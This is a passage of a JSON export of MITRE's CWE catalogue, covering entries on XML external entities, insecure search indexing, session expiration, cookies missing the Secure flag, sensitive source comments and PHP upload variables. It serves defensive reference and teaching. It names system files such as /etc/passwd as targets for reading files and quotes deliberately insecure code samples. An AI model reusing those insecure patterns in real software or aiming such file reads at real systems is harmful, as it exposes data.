Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Externally Controlled Reference to an Internal Resource","attr":{"@_Date":"2008-04-11"}}}},"611":{"attr":{"@_ID":"611","@_Name":"Improper Restriction of XML External Entity Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.","Extended_Description":{"xhtml:p":["XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing.","By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as \\"file:///c:/winnt/win.ini\\" designates (in Windows) the file C:\\\\Winnt\\\\win.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning.","Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XXE","Description":"XXE is an acronym used for the term \\"XML eXternal Entities\\""}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The software could consume excessive CPU cycles or memory using a URI that points to a large file, or a device that always returns data such as /dev/random. Alternately, the URI could reference a file that contains many nested or recursive entity references to further slow down parsing."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","System Configuration"],"Description":"Many XML parsers and validators can be configured to disable external entity expansion."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1306","Description":"A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1306"},{"Reference":"CVE-2012-5656","Description":"XXE during SVG image conversion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5656"},{"Reference":"CVE-2012-2239","Description":"XXE in PHP application allows reading the application\'s configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2239"},{"Reference":"CVE-2012-3489","Description":"XXE in database server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489"},{"Reference":"CVE-2012-4399","Description":"XXE in rapid web application development framework allows reading arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4399"},{"Reference":"CVE-2012-3363","Description":"XXE via XML-RPC request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3363"},{"Reference":"CVE-2012-0037","Description":"XXE in office document product using RDF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0037"},{"Reference":"CVE-2011-4107","Description":"XXE in web-based administration tool for database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107"},{"Reference":"CVE-2010-3322","Description":"XXE in product that performs large-scale data analysis.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3322"},{"Reference":"CVE-2009-1699","Description":"XXE in XSL stylesheet functionality in a common library used by some web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1699"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":43,"Entry_Name":"XML External Entities"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"221"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-496"}},{"attr":{"@_External_Reference_ID":"REF-497"}},{"attr":{"@_External_Reference_ID":"REF-498"}},{"attr":{"@_External_Reference_ID":"REF-499"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-501"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through XML External Entity File Disclosure","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through XML External Entity Reference","attr":{"@_Date":"2013-02-21"}},{"#text":"Improper Restriction of XML External Entity Reference (\'XXE\')","attr":{"@_Date":"2019-06-20"}}]}},"612":{"attr":{"@_ID":"612","@_Name":"Improper Authorization of Index Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.","Extended_Description":"Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search.  If the index\'s results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results.  The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":48,"Entry_Name":"Insecure Indexing"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1050"}}},"Notes":{"Note":{"#text":"This weakness is probably under-studied and under-reported","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Insecure Indexing","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Indexing of Private Data","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Indexing of Private Data","attr":{"@_Date":"2020-02-24"}}]}},"613":{"attr":{"@_ID":"613","@_Name":"Insufficient Session Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"According to WASC, \\"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set sessions/credentials expiration date."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"&lt;web-app&gt;&lt;/web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"[...snipped...]&lt;session-config&gt;&lt;/session-config&gt;","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;session-timeout&gt;-1&lt;/session-timeout&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":47,"Entry_Name":"Insufficient Session Expiration"}},"Notes":{"Note":{"#text":"The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser\'s back button to access web pages previously accessed by the victim.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"WASC","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"614":{"attr":{"@_ID":"614","@_Name":"Sensitive Cookie in HTTPS Session Without \'Secure\' Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always set the secure attribute when the cookie should sent via HTTPS only."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie c = new Cookie(ACCOUNT_ID, acctID);response.addCookie(c);","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0462","Description":"A product does not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the product.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0462"},{"Reference":"CVE-2008-3663","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663"},{"Reference":"CVE-2008-3662","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3662"},{"Reference":"CVE-2008-0128","Description":"A product does not set the secure flag for a cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unset Secure Attribute for Sensitive Cookies in HTTPS Session","attr":{"@_Date":"2008-04-11"}}}},"615":{"attr":{"@_ID":"615","@_Name":"Inclusion of Sensitive Information in Source Code Comments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.","Extended_Description":"An attacker who finds these comments can map the application\'s structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"546","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Distribution","Description":"Remove comments which have sensitive information about the design/implementation of the application. Some of the comments may be exposed to the user and affect the security posture of the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following comment, embedded in a JSP, will be displayed in the resulting HTML output.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"&lt;!-- FIXME: calling this with more than 30 args kills the JDBC server --&gt;"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6197","Description":"Version numbers and internal hostnames leaked in HTML comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6197"},{"Reference":"CVE-2007-4072","Description":"CMS places full pathname of server in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4072"},{"Reference":"CVE-2009-2431","Description":"blog software leaks real username in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2431"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Comments","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Comments","attr":{"@_Date":"2020-02-24"}}]}},"616":{"attr":{"@_ID":"616","@_Name":"Incomplete Identification of Uploaded File Variables (PHP)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files.","Extended_Description":"These global variables could be overwritten by POST requests, cookies, or other methods of populating or overwriting these variables. This could be used to read or process arbitrary files by providing values such as \\"/etc/passwd\\".","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"473","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use PHP 4 or later."},{"Phase":"Architecture and Design","Description":"If you must support older PHP versions, write your own version of is_uploaded_file() and run it against $HTTP_POST_FILES[\'userfile\']))"},{"Phase":"Implementation","Description":"For later PHP versions, reference uploaded files using the $HTTP_POST_FILES or $_FILES variables, and use is_uploaded_file() or move_uploaded_file() to ensure that you are dealing with an uploaded file."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"As of 2006, the \\"four globals\\" method is probably in sharp decline, but older PHP applications could have this issue.","Body_Text":"In the \\"four globals\\" method, PHP sets the following 4 global variables (where \\"varname\\" is application-dependent):","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$varname = name of the temporary file on local machine$varname_size = size of file$varname_name = original name of file provided by client$varname_type = MIME type of the file","xhtml:br":["","",""]}}},{"Intro_Text":"\\"The global $_FILES exists as of PHP 4.1.0 (Use $HTTP_POST_FILES instead if using an earlier version). These arrays will contain all the uploaded file information.\\"","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$_FILES[\'userfile\'][\'name\'] - original filename from client$_FILES[\'userfile\'][\'tmp_name\'] - the temp filename of the file on the server","xhtml:br":""}},"Body_Text":"** note: \'userfile\' is the field name from the web form; this can vary."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1460","Description":"Forum does not properly verify whether a file was uploaded or if the associated variables were set by POST, allowing remote attackers to read arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1460"},{"Reference":"CVE-2002-1759","Description":"Product doesn\'t check if the variables for an upload were set by uploading the file, or other methods such as $_POST.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1759"},{"Reference":"CVE-2002-1710","Description":"Product does not distinguish uploaded file from other files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1710"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Identification of Uploaded File Variables (PHP)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-502"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content 